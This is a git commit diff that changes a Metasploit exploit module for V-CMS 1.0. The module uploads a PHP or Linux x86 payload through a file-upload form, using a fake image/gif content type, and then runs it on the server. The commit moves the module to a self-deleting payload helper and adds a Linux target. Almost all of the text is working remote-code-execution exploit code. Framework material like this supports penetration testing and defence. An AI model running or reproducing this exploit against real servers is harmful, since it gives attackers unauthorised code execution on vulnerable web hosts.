Convert vcms_upload to use PhpEXE

Incidentally adds a Linux x86 target
2012-10-12 04:29:16 -05:00 · 2012-10-12 04:29:16 -05:00 · db12413b09
parent 13a5892e95
commit db12413b09
1 changed files with 8 additions and 24 deletions
--- a/modules/exploits/linux/http/vcms_upload.rb
+++ b/modules/exploits/linux/http/vcms_upload.rb
@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking

 	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::PhpEXE

 	def initialize(info={})
 		super(update_info(info,
@ -28,8 +29,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			'License'        => MSF_LICENSE,
 			'Author'         =>
 				[
-					'AutoSec Tools',  #Initial discovery
-					'sinn3r'          #Metasploit
+					'AutoSec Tools',  # Initial discovery
+					'sinn3r'          # Metasploit
 				],
 			'References'     =>
 				[
@ -42,15 +43,12 @@ class Metasploit3 < Msf::Exploit::Remote
 				{
 					'BadChars' => "\x00",
 				},
-			'DefaultOptions'  =>
-				{
-					'EXITFUNC' => "none"
-				},
 			'Platform'       => 'php',
 			'Arch'           => ARCH_PHP,
 			'Targets'        =>
 				[
-					['V-CMS 1.0', {}],
+					[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }  ],
+					[ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => "Nov 27 2011",  #When the ticket was created
@ -75,15 +73,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 	end

-	def on_new_session(client)
-		if client.type == "meterpreter"
-			client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
-			client.fs.file.rm(@payload_name)
-		else
-			client.shell_command_token("rm #{@payload_name}")
-		end
-	end
-
 	def exploit
 		peer = "#{rhost}:#{rport}"

@ -91,18 +80,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		base << '/' if base[-1,1] != '/'

 		@payload_name = "#{rand_text_alpha(5)}.php"
-		p = %Q|<?php
-		#{payload.encoded}
-		?>
-		|
-
-		p = p.gsub(/^\t\t/, '')
+		p = get_write_exec_payload(:unlink_self=>true)

 		post_data = "------x\r\n"
 		post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"\r\n"
 		post_data << "Content-Type: image/gif\r\n"
 		post_data << "\r\n"
-		post_data << p
+		post_data << p + "\r\n"
 		post_data << "------x--\r\n"

 		print_status("#{peer} Uploading payload: #{@payload_name}")
@ -133,4 +117,4 @@ class Metasploit3 < Msf::Exploit::Remote

 		handler
 	end
-end
+end